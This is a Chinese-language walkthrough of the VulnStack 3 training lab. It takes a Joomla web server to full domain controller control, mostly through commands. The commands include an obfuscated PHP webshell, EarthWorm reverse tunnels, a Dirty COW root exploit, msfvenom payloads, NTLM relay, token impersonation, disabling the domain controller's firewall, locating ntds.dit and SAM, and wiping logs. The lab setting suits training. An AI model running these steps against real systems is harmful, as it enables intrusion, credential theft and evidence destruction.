
红日靶场三深度实战从Web渗透到域控提权的ATTCK战术拆解1. 靶场环境与攻击路径全景红日安全团队设计的VulnStack靶场系列已成为渗透测试人员进阶训练的黄金标准。第三套靶场环境模拟了典型企业混合架构——外网Web服务器CentOSUbuntu双机负载、内网域环境Windows Server 2012域控Windows 7工作站Windows Server 2008应用服务器组成的攻防演练场景。核心攻击链路由五个关键阶段构成外网Web应用突破MySQL凭据泄露→后台getshell内网代理搭建EarthWorm反向隧道Linux提权作战脏牛漏洞利用横向移动渗透NTLM Relay攻击链域控终极控制Token窃取防火墙绕过攻击者需要依次突破三层防御圈外网Web应用层80/3306端口内网Linux服务器UbuntuCentOSWindows域环境2008→2012渗透路径实验环境配置要点所有内网主机采用Host-Only模式192.168.93.0/24Kali攻击机通过双网卡桥接实现内外网访问。2. Web突破从MySQL泄露到Webshell获取2.1 信息收集与漏洞定位端口扫描显示目标开放关键服务nmap -sV 192.168.119.118PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4 (protocol 2.0) 80/tcp open http Apache httpd 2.4.6 ((CentOS)) 3306/tcp open mysql MySQL 5.6.51目录扫描发现Joomla后台路径http://192.168.119.118/administrator/index.php突破关键通过配置文件泄露获取数据库凭据http://192.168.119.118/configuration.phppublic $user testuser; public $password cvcvgjASD!; public $db joomla_db;2.2 MySQL注入攻击实战使用泄露凭据远程登录数据库mysql -h 192.168.119.118 -u testuser -pcvcvgjASD!执行权限提升操作-- 修改管理员密码需MD5加密 UPDATE joomla_users SET password MD5(Admin123) WHERE username admin; -- 添加新管理员账户 INSERT INTO joomla_users (username, password, name, email) VALUES (hacker, MD5(Pssw0rd), Pentester, testexample.com); -- 分配超级用户权限 INSERT INTO joomla_user_usergroup_map (user_id, group_id) VALUES ((SELECT id FROM joomla_users WHERE usernamehacker), 8);2.3 Webshell部署与绕过技巧通过Joomla模板编辑器植入PHP后门?php // 混淆型一句话木马 $c $_REQUEST[x]; if(isset($c)){ system(base64_decode($c)); } ?disable_functions绕过方案上传LD_PRELOAD劫持so文件使用蚁剑插件绕过disable_functions通过PHP-FPM未授权访问漏洞最终获取的Webshell权限信息whoami # www-data id # uid33(www-data) gid33(www-data) groups33(www-data)3. 内网渗透代理搭建与提权作战3.1 网络拓扑探测通过Webshell执行内网扫描ifconfig # eth0: 192.168.119.118 # eth1: 192.168.93.100 arp -a # 192.168.93.20 (Win2008) # 192.168.93.30 (Win7) # 192.168.93.10 (Win2012)3.2 隧道搭建实战使用EarthWorm建立三级级联代理# 攻击机执行 ./ew -s lcx_listen -l 1080 -e 8888 # 跳板机执行 ./ew -s lcx_slave -d 攻击机IP -e 8888 -f 内网IP -g 9999 # 目标内网执行 ./ew -s rssocks -d 跳板机IP -e 9999代理配置验证proxychains nmap -sT -Pn 192.168.93.103.3 脏牛提权全流程漏洞验证uname -a # Linux web-centos 3.10.0-1127.el7.x86_64 grep -i dirty /proc/version提权操作gcc -pthread dirty.c -o dirty -lcrypt ./dirty myNewPassword提权后关键操作cat /etc/shadow ssh-keygen -t rsa -f /root/.ssh/id_rsa4. 横向移动NTLM Relay攻击链详解4.1 攻击原理与环境准备NTLM Relay三要素SMB签名未强制启用内网存在特权账户可诱导用户访问恶意服务器工具准备git clone https://github.com/SecureAuthCorp/impacket cd impacket/examples生成恶意payloadmsfvenom -p windows/x64/meterpreter/bind_tcp \ LHOST192.168.93.100 LPORT4444 -f exe shell.exe4.2 攻击实施步骤启动SMB中继服务python3 smbrelayx.py -h 192.168.93.20 -e ./shell.exeMSF配置监听use exploit/multi/handler set payload windows/x64/meterpreter/bind_tcp set RHOST 192.168.93.20 set LPORT 4444 run触发条件当域用户访问\192.168.93.100时自动完成凭证窃取哈希中继payload投递4.3 后渗透关键操作获取域管理员Tokenload incognito list_tokens -u impersonate_token TEST\\Administrator定位域控制器net group Domain Controllers /domain5. 域控突破从权限提升到数据窃取5.1 防火墙绕过技术通过WMI远程关闭防护Invoke-WmiMethod -ComputerName DC01 -Class Win32_Process -Name Create -ArgumentList netsh advfirewall set allprofiles state off5.2 敏感数据定位技巧域控常见数据存储位置\\DC01\C$\Users\Administrator\Documents \\DC01\C$\Windows\NTDS\ntds.dit \\DC01\C$\Windows\System32\config\SAM使用PowerShell搜索机密文件Get-ChildItem -Path C:\ -Recurse -Include *.doc,*.xls,*.pdf -Force -ErrorAction SilentlyContinue | Select-Object FullName5.3 痕迹清理方案Linux系统history -c rm -rf /var/log/auth.logWindows系统wevtutil cl Security wevtutil cl System